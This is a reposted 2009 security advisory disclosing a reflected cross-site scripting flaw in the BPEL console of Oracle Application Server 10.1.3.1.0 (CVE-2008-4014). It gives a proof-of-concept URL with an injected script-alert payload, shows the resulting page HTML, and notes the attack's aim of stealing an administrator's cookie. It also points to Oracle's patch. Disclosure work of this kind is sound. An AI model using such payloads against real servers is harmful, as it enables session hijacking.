Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Oracle Application Server Cross Site Scripting

Related Vulnerabilities: CVE-2008-4014  
Publish Date: 15 Jan 2009
Author: Sh2kerr, dsecrg.com
Source 
                							

                
Digital Security Research Group [DSecRG] Advisory    #DSECRG-09-001



Application:      Oracle Application Server (SOA)
Versions Affected:    Oracle Application Server (SOA) version 10.1.3.1.0  
Vendor URL:      http://www.oracle.com
Bugs:        XSS
Exploits:      YES
Reported:      10.01.2008
Vendor response:    11.01.2008
Date of Public Advisory:        13.01.2009
CVE:                            CVE-2008-4014
Description:               XSS IN BPELCONSOLE/DEFAULT/ACTIVITIES.JSP 
Author:              Alexandr Polyakov
        Digital Security Reasearch Group [DSecRG] (research [at] dsec [dot] ru)


Description
***********

Linked XSS vulnerability found in  BPEL module of Oracle Application Server (Oracle SOA Suite).  



Details
*******


Linked XSS vulnerability found in  BPEL module. In page BPELConsole/default/activities.jsp   attacker can inject XSS by appending it to URL




Example
*******


http://[localhost]:8888/BPELConsole/default/activities.jsp?'><script>alert('DSEC_XSS')</script>=DSecRG



Attacker must send injected link to administrator and get adminiatrators cookie.


Code with injected XSS:

----------------------------------------------------------------

 </th>
                    <th id="activityLabel" class="ListHeader" align="left" nowrap>
                    <a href='activities.jsp?'><script>alert('DSecRG_XSS')</script>=DSecRG&orderBy=label' class=HeaderLink>
                        Activity Label
                    </a>
                    </th>

---------------------------------------------------------------------------


Fix Information
***************

Information was published in CPU January 2009.
All customers can download CPU petches following instructions from: 

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html 



Credits
*******
Oracle give a credits for Alexander Polyakov from Digital Security Company in CPU January 2009.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html 




About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:  research [at] dsec [dot] ru
    http://www.dsecrg.ru 
    http://www.dsec.ru






<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started